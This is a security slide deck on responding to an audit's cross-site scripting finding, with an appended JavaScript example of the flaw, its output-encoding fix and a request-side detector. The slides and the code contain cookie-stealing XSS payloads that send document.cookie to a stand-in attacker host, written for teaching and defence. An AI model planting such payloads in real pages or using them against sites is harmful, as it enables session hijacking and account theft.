Outline: Web Audit Vulnerability; Business Problem; Audit Response; Resolution Steps; Investigation; cross-site scripting; XSS concept; Auditor finding; XSS types; Risks; Our actual risk; Planned Audit Response; More on Web Attacks; Artifacts; Cross Site Scripting Example 1; Cross Site Scripting Example 2; Cross Site Scripting Detection; SQL Injection Example; SQL Injection Detection; XPATH Injection Example; LDAP Injection Example; LDAP Injection Detection; SSI Injection Example; SSI Injection Detection; JSP Injection Example; JSP Injection Prevention; Defense Approaches; Q&A; Backup Slides; user agent injection; Approaches; XPATH Injection Detection

Web Audit Vulnerability
cross-site scripting (XSS) concerns
by Ron Widitz

Business Problem
- Independent security audit
- Regulatory compliance
- XSS issue raised
- Must provide a response

Audit Response
Either:
  – Prove issue to be a non-problem
or
  – Describe actions to take

Resolution Steps
- Investigate security concerns
- Restate as IT problem(s)
- Determine solution(s)
- Provide audit response
- Mitigate risk

Investigation
- Define cross-site scripting (XSS)
- Examine how auditors applied it
- Identify risks
- Research preliminary solutions

cross-site scripting
- Attacker goal: get their code into the victim's browser
- XSS forces a website to execute malicious code in the browser
- Browser user is the intended victim
- Why? Account hijacking, keystroke recording, intranet hacking, theft…

XSS concept

Auditor finding
- Freeform edit box
- Message to Customer Service

XSS types
- Immediate reflection : phishing
- DOM-based : 95 JavaScript methods
- Redirection : header, meta, dynamic
- Multimedia : Flash, QT, PDF scripts
- Cross-Site Request Forgery (CSRF)
- others…
  – (e.g. non-persistent search box)

Risks
- XSS abuses render engines or plug-ins
- Steal browser cookies
- Steal session info for replay attack
- Malware or bot installation
- Redirect or phishing attempt

Our actual risk
- Currently, none.
- Edit box info viewed in thick client
- DHTML or JavaScript needs a browser
- Our thick client is Java Swing-based

Planned Audit Response
- Could indicate "no audit problem"
- Might have future impact
- Address through dev standards
- Consider application firewall
- Widen problem scope to include all user agent injection tactics

More on Web Attacks
- Cross Site Scripting
- SQL Injection
- XPATH Injection
- LDAP Injection
- SSI (server side inclusion) Injection
- JSP (Java server pages) Injection

Artifacts
- For each injection issue:
  – Vulnerability description documented
  – Preventative coding technique
- Discuss with App Dev teams
  – Publish and socialize direction
  – Include in peer reviews/code walkthroughs
  – Set deadlines for full incorporation
- Communicate with auditors

Cross Site Scripting Example 1
Trudy posts the following JavaScript on a message board:
<SCRIPT>
document.location='http://trudyhost/cgi-bin/stealcookie.cgi?'+document.cookie
</SCRIPT>
When Bob views the posted message, his browser executes the malicious script, and his session cookie is sent to Trudy (stored XSS: the payload is served to every reader of the message).

Cross Site Scripting Example 2
Trudy sends Bob a link to the following URL, which takes him to a personalized page:
http://host/personalizedpage.php?username=<script>document.location='http://trudyhost/cgi-bin/stealcookie.cgi?'+document.cookie</script>
A page is returned that contains the malicious script instead of the username Bob, and Bob's browser executes the script, causing his session cookie to be sent to Trudy (reflected XSS: the payload lives in the link, not on the server).
Hex (URL-encoded %xx sequences) is often used in place of ASCII for the JavaScript to make the URL less suspicious.

Cross Site Scripting Detection
- A client usually is not supposed to send scripts to servers
  – If the server receives <SCRIPT>… or the hex equivalent
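The following Node.js code is an added example, not part of the slide deck: it models a hypothetical personalized-page handler for Example 2, shows why the cookie-stealing payload executes when the username is concatenated into HTML and why it does not once the output is HTML-encoded, and implements the server-side check the Detection slide describes, decoding the "hex" (percent-encoded, including double-encoded) form of the parameter before looking for a script tag. The hosts `host` and `trudyhost` and the payload are the deck's own; the function names, the request samples and the decoding depth are assumptions made for this example.

```javascript
// Added example (not from the slide deck). Models the reflected XSS of
// Example 2, its output-encoding fix, and a request-side script-tag check
// that also catches the URL-encoded ("hex") form of the payload.

// The payload from Example 2 of the deck, as Trudy would put it in the link.
const PAYLOAD =
  "<script>document.location='http://trudyhost/cgi-bin/stealcookie.cgi?'+document.cookie</script>";

// The same payload with its special characters percent-encoded (e.g. "<" -> "%3C"),
// the "hex in place of ASCII" form the deck mentions.
const ENCODED_PAYLOAD = encodeURIComponent(PAYLOAD);

// Vulnerable rendering (hypothetical handler): the username parameter is
// concatenated into the HTML unchanged, so the browser parses Trudy's <script>.
function renderPersonalizedPageVulnerable(username) {
  return `<html><body><h1>Welcome, ${username}</h1></body></html>`;
}

// Hardened rendering: every character with meaning to the HTML parser is
// replaced by an entity, so the payload is displayed as text, not executed.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (c) => map[c]);
}

function renderPersonalizedPageSafe(username) {
  return `<html><body><h1>Welcome, ${escapeHtml(username)}</h1></body></html>`;
}

// Detection: percent-decode the raw parameter repeatedly (up to three rounds,
// an assumed limit) until it stops changing, so "%253Cscript" (double encoded)
// is seen as "<script". decodeURIComponent throws on malformed sequences such
// as a lone "%"; that input is reported as null so the caller can flag it.
function normalizeParam(value) {
  let current = value;
  for (let round = 0; round < 3; round++) {
    let decoded;
    try {
      decoded = decodeURIComponent(current);
    } catch (e) {
      return null;
    }
    if (decoded === current) break;
    current = decoded;
  }
  return current;
}

// Case-insensitive, so <SCRIPT> (as written on the slides) and <script> both match.
const SCRIPT_TAG = /<\s*script\b/i;

function looksLikeScriptInjection(rawValue) {
  const normalized = normalizeParam(rawValue);
  if (normalized === null) return true; // undecodable input is treated as suspicious
  return SCRIPT_TAG.test(normalized);
}

// Minimal query-string walk over a raw request URL; splits on the first "="
// of each pair so "=" inside the payload stays part of the value.
function scanQueryString(url) {
  const q = url.indexOf("?");
  if (q === -1) return [];
  const flagged = [];
  for (const pair of url.slice(q + 1).split("&")) {
    const eq = pair.indexOf("=");
    const name = eq === -1 ? pair : pair.slice(0, eq);
    const raw = eq === -1 ? "" : pair.slice(eq + 1);
    if (looksLikeScriptInjection(raw)) flagged.push(name);
  }
  return flagged;
}

// Constructed sample requests: the Example 2 link as-is, its hex-encoded
// form, and a legitimate request from Bob.
const REQUESTS = [
  `http://host/personalizedpage.php?username=${PAYLOAD}`,
  `http://host/personalizedpage.php?username=${ENCODED_PAYLOAD}`,
  "http://host/personalizedpage.php?username=Bob&theme=dark",
];

for (const url of REQUESTS) {
  const flagged = scanQueryString(url);
  console.log(flagged.length ? `SUSPICIOUS ${flagged.join(",")}` : "ok", url.slice(0, 60));
}
console.log(renderPersonalizedPageVulnerable(PAYLOAD));
console.log(renderPersonalizedPageSafe(PAYLOAD));
```

The detection function is a screening control in the spirit of the slide, not the fix: it only recognises a script tag, while an attacker can reach script execution through event-handler attributes, `javascript:` URLs or the multimedia and DOM-based routes the "XSS types" slide lists. The rendering change (encode on output) is what actually closes the hole, and the two belong together, with the detector feeding logging or an application firewall as the "Planned Audit Response" slide suggests.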